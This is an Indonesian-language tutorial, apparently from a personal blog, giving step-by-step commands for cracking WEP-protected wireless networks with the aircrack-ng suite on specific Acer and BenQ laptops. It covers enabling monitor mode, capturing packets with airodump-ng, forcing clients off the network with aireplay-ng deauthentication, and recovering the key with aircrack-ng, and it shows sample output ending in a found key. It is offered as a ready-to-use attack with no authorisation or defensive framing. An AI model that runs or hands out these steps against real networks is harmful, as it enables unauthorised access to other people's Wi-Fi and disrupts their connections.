Aircrak-ptw adalah tool yang digunakan untuk meng-crack wireless yang diproteksi dengan WEP.Masing-masing notebook dengan spesifikasi berbeda, sehingga cara untuk menggunakan aircrack pun berbeda. Langkah-langkah untuk menggunakan aircrack-ptw untuk beberapa seri notebook adalah sebagai berikut:
ACER 4520, OS Linux Mint Elyssa
Step 1 : Setting wireless card
$ sudo airmon-ng stop ath0
kalau pake “stop” masih “monitor mode disabled”, ganti dengan ” .. start ath0″
kemudian masukkan
$ iwconfig
Sistem harus merespon sebagai berikut :
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
Step 2 : Start wireless card
$ airmon-ng start wifi0
“9″ adalah channel yang digunakan, chanel ini bisa dilihat melalui kismet
respon sistem harus sebagai berikut:
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
kemudian masukkan
$ iwconfig
dan pastikan bahwa resppon sistem sebagai berikut
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:”” Nickname:””
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Step 3 : Jalankan airodump-ng
airodump-ng digunakan untuk mengcapture paket dari akses point
$ sudo airodump-ng –channel X –write prefix_for_capture_file interface
misal
$ sudo airodump-ng –channel 3 –write tes ath0
“tes” dimaksudkan bahwa file yang dicapture akan ditulis pada file tes.cap (biasanya tes-01.cap), file .cap tersebut akan di create secara otomatis oleh airodump.
untuk mengetahui channel yang digunakan maka hilangkan channel pada command diatas
$ airodump-ng –write tes ath0
Step 4 : Deauthenticate Clients(optional)
tahap ini dilakukan jika client tidak memberikan ARP request, jadi harus memaksa client untuk men-generate ARP request.
$ sudo aireplay-ng –deauth 15 -a MAC_of_AP -c MAC_client yg_diserang
misal
$ sudo aireplay-ng –deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0 ath0
* -a BSSID/Mac address akses point
* -c MAC Address client
* 15 jumlah paket yang dikirim
Step 5: jalankan aircrak-ptw untuk mengenerate WEP dari akses point.
$ sudo aircrack-ptw tes-01.cap
atau bisa juga menggunakan aircrack-ptw yang sudah dibuild dalam aircrack-ng
$ sudo aircrack-ng -z tes-01.cap -b mac_ssid
misal
$ sudo aircrack-ng -z tes-01.cap -b 00:xx:xx:xx:xx:xx
contoh output :
i $ sudo aircrack-ng -z tohack-01.cap -b 00:xx:xx:xx:xx:xx
Opening tohack-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 261446 ivs.
Aircrack-ng 1.0 beta1
[00:00:00] Tested 81 keys (got 21872 IVs)
KB depth byte(vote)
0 1/ 3 00(28672) 58(27904) 03(26880) 2E(26880) 62(26880) 89(26880) 27(26112) 3F(26112) 0A(25856)
1 3/ 5 8C(27648) CD(27392) 9D(26624) FC(26624) 2B(26112) 87(26112) 14(25856) 77(25856) 7B(25856)
2 0/ 1 EF(31744) FC(29184) 12(28416) 92(27648) CE(27136) 1F(26624) 25(26368) DD(26368) 4C(26112)
3 1/ 6 43(28672) AE(28416) 41(28416) 07(28160) 2F(28160) B2(27392) 5E(26880) CD(26624) 2B(26368)
4 0/ 1 21(30976) 4B(27904) 84(27392) 21(26624) 83(26624) AD(26368) F1(26368) DA(26112) F6(26112)
KEY FOUND! [ 00:xD:EF:xx:xx ] ini adalah key atau password dari wireless network yang didapatkan
ACER 4920, OS:lINUX UBUNTU
Pada acer seri ini wireless card yang digunakan adalah wlan0, dan bukan dengan command ” $ sudo airmon-ng stop ath0″ tetapi
$ sudo airmon-ng start wlan0
untuk langkah selanjutnya sama dengan ACER 4520
BenQ S53W,OS LINUX UBUNTU
pada seri ini wireless card yang digunakan adalah eth 1, dan bukan dengan command “…stop eth1″ tetapi
$ airmon-ng start eth1
Selamat mencoba
Catatan : untuk mengetahui wireless yang digunakan gunakan command ” $ iwconfig ”
"MEMBUAT SESUATU YANG TIDAK MUNGKIN MENJADI MUNGKIN"
"FRUZI ALBAR FRUZTECKER"